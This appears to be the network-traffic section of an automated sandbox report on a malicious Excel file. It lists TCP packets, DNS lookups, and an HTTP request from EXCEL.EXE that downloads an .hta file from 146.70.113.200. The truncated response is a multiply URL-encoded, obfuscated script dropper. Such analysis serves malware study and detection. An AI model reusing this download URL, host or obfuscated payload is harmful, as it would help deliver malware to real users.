                                                  Dec 2, 2024 07:25:36.054276943 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.054366112 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.054409981 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.055831909 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.057399035 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.057410002 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.057452917 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.057488918 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.059021950 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.059032917 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.059070110 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.060556889 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.060606003 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.060614109 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.062124014 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.062190056 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.063215017 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.063713074 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.063761950 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.063906908 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.065306902 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.065356970 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.065496922 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.066907883 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.066955090 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.067353964 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.068519115 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.068530083 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.068566084 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.070215940 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.070882082 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.070943117 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.071619034 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.071985960 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.072026014 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.073312044 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074836969 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074846029 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074856997 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074889898 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.074903965 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.076376915 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.076579094 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.076625109 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.077961922 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.078007936 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.078053951 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.079555988 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.079674006 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.079719067 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.081130028 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.082532883 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.082581997 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.082705021 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.083373070 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.083420992 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.084357023 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.084368944 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.084404945 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.101244926 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.115634918 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116077900 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116122961 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.116449118 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116461992 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116499901 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.118011951 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119241953 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119282007 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.119623899 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119853020 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119893074 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.121191978 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.196647882 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.196702957 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.217706919 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.217792034 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.217854023 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.218030930 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.218229055 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.218266964 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.219340086 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.219500065 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.219546080 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.220441103 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.220649004 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.220691919 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.221636057 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.222676039 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.222758055 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.222858906 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.222870111 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.222901106 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.224006891 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.224231005 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.224282980 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.225214958 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.226434946 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.226444960 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.226476908 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.226485014 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.227613926 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.227658033 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.227773905 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.228771925 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.228812933 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.229113102 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.230001926 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.230042934 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.230602026 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.231195927 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.231206894 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.231235027 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.232426882 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.232472897 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.233139038 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.233591080 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.233639956 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.233972073 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.234806061 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.234818935 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.234848976 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.235960007 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.236263990 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.236323118 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.237142086 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.237360001 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.237402916 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.238364935 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.238487005 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.238532066 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.239502907 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.239640951 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.239682913 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.240364075 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.241136074 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.241175890 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.241410017 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.241420984 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.241451979 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.241993904 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.242825985 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.242836952 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.242847919 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.242873907 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.242887020 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.243613958 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.244177103 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.244223118 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.244458914 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.244468927 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.244512081 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.245248079 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.246082067 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.246093035 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.246124983 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.246129036 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.246869087 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.246908903 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.247292042 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.247736931 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.247747898 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.247776031 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.248554945 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.248564959 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.248615026 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.249305010 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.263765097 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.418646097 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.647612095 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.765165091 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.765229940 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.949963093 CET4917480192.168.2.22146.70.113.200

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 2, 2024 07:24:32.442085981 CET5456253192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:32.798927069 CET53545628.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:37.543407917 CET5291753192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:37.902149916 CET53529178.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:37.902837038 CET5291753192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:38.259088039 CET53529178.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:38.259401083 CET5291753192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:38.393501043 CET53529178.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:56.252788067 CET6275153192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:56.517004967 CET53627518.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:56.520430088 CET5789353192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:56.901190996 CET53578938.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:58.773317099 CET5482153192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:59.131899118 CET53548218.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:59.132283926 CET5482153192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:59.267518044 CET53548218.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:24:59.269537926 CET5482153192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:24:59.392216921 CET53548218.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:25:14.974669933 CET5471953192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:25:15.347440004 CET53547198.8.8.8192.168.2.22
                                                  Dec 2, 2024 07:25:15.352849960 CET4988153192.168.2.228.8.8.8
                                                  Dec 2, 2024 07:25:15.487755060 CET53498818.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 2, 2024 07:24:32.442085981 CET192.168.2.228.8.8.80xc54cStandard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:37.543407917 CET192.168.2.228.8.8.80xc1c3Standard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:37.902837038 CET192.168.2.228.8.8.80xc1c3Standard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:38.259401083 CET192.168.2.228.8.8.80xc1c3Standard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:56.252788067 CET192.168.2.228.8.8.80xf911Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:56.520430088 CET192.168.2.228.8.8.80xf733Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:58.773317099 CET192.168.2.228.8.8.80x6222Standard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.132283926 CET192.168.2.228.8.8.80x6222Standard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.269537926 CET192.168.2.228.8.8.80x6222Standard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:25:14.974669933 CET192.168.2.228.8.8.80x6fa1Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:25:15.352849960 CET192.168.2.228.8.8.80x46afStandard query (0)1016.filemail.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 2, 2024 07:24:32.798927069 CET8.8.8.8192.168.2.220xc54cNo error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:32.798927069 CET8.8.8.8192.168.2.220xc54cNo error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:37.902149916 CET8.8.8.8192.168.2.220xc1c3No error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:37.902149916 CET8.8.8.8192.168.2.220xc1c3No error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:38.259088039 CET8.8.8.8192.168.2.220xc1c3No error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:38.259088039 CET8.8.8.8192.168.2.220xc1c3No error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:38.393501043 CET8.8.8.8192.168.2.220xc1c3No error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:38.393501043 CET8.8.8.8192.168.2.220xc1c3No error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:56.517004967 CET8.8.8.8192.168.2.220xf911No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                  Dec 2, 2024 07:24:56.517004967 CET8.8.8.8192.168.2.220xf911No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:56.901190996 CET8.8.8.8192.168.2.220xf733No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                  Dec 2, 2024 07:24:56.901190996 CET8.8.8.8192.168.2.220xf733No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.131899118 CET8.8.8.8192.168.2.220x6222No error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.131899118 CET8.8.8.8192.168.2.220x6222No error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.267518044 CET8.8.8.8192.168.2.220x6222No error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.267518044 CET8.8.8.8192.168.2.220x6222No error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.392216921 CET8.8.8.8192.168.2.220x6222No error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:24:59.392216921 CET8.8.8.8192.168.2.220x6222No error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:25:15.347440004 CET8.8.8.8192.168.2.220x6fa1No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                  Dec 2, 2024 07:25:15.347440004 CET8.8.8.8192.168.2.220x6fa1No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false
                                                  Dec 2, 2024 07:25:15.487755060 CET8.8.8.8192.168.2.220x46afNo error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                  Dec 2, 2024 07:25:15.487755060 CET8.8.8.8192.168.2.220x46afNo error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • linkjago.me
                                                  • 1016.filemail.com
                                                  • 146.70.113.200

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.2249162146.70.113.200803392C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Dec 2, 2024 07:24:35.584834099 CET359OUTGET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:24:37.155558109 CET1236INHTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:24:36 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:16:18 GMT
                                                  ETag: "26ee1-62840224d2d3d"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 159457
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/hta
                                                  Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 53 63 72 69 70 74 25 32 35 32 30 4c 61 6e 67 75 61 67 65 25 32 35 33 44 25 32 35 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 35 32 37 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 32 30 48 54 4d 4c 25 32 35 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 35 32 30 70 72 6f 76 69 64 65 64 25 32 35 32 30 62 79 25 32 35 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 35 32 30 2d 2d 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 25 32 35 32 35 34 34 25 32 35 32 35 34 46 25 32 35 32 35 34 33 25 32 35 32 35 35 34 25 32 35 32 35 35 39 25 32 35 32 35 35 30 25 32 35 32 35 34 35 25 [TRUNCATED]
                                                  Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%2525
                                                  Dec 2, 2024 07:24:37.155585051 CET1236INData Raw: 33 43 25 32 35 32 35 35 33 25 32 35 32 35 34 33 25 32 35 32 35 37 32 25 32 35 32 35 36 39 25 32 35 32 35 35 30 25 32 35 32 35 35 34 25 32 35 32 35 32 30 25 32 35 32 35 35 34 25 32 35 32 35 35 39 25 32 35 32 35 35 30 25 32 35 32 35 34 35 25 32 35
                                                  Data Ascii: 3C%252553%252543%252572%252569%252550%252554%252520%252554%252559%252550%252545%25253D%252522%252574%252545%252578%252574%25252F%252576%252542%252553%252543%252572%252549%252550%252574%252522%25253E%25250A%252564%252569%25254D%252509%252509%25
                                                  Dec 2, 2024 07:24:37.155606985 CET448INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                  Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                  Dec 2, 2024 07:24:37.155690908 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                  Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                  Dec 2, 2024 07:24:37.155720949 CET1236INData Raw: 43 25 32 35 32 35 35 41 25 32 35 32 35 35 34 25 32 35 32 35 36 46 25 32 35 32 35 35 32 25 32 35 32 35 36 38 25 32 35 32 35 34 41 25 32 35 32 35 36 46 25 32 35 32 35 35 32 25 32 35 32 35 37 35 25 32 35 32 35 34 32 25 32 35 32 35 37 30 25 32 35 32
                                                  Data Ascii: C%25255A%252554%25256F%252552%252568%25254A%25256F%252552%252575%252542%252570%252573%252573%252570%25256F%252554%252548%25255A%25254C%252569%252568%25254F%25254D%25256F%252546%25256D%252566%252566%252578%252555%252553%252558%252554%252559%252
                                                  Dec 2, 2024 07:24:37.155730963 CET1236INData Raw: 32 35 37 34 25 32 35 32 35 37 41 25 32 35 32 35 36 39 25 32 35 32 35 36 32 25 32 35 32 35 35 35 25 32 35 32 35 37 34 25 32 35 32 35 37 36 25 32 35 32 35 35 34 25 32 35 32 35 35 38 25 32 35 32 35 34 41 25 32 35 32 35 36 45 25 32 35 32 35 36 43 25
                                                  Data Ascii: 2574%25257A%252569%252562%252555%252574%252576%252554%252558%25254A%25256E%25256C%252545%252568%252567%252565%25254B%252550%252579%25257A%252578%25255A%25254C%252577%252550%25254D%252579%252576%25256F%252568%252559%252564%25256A%252509%252509%
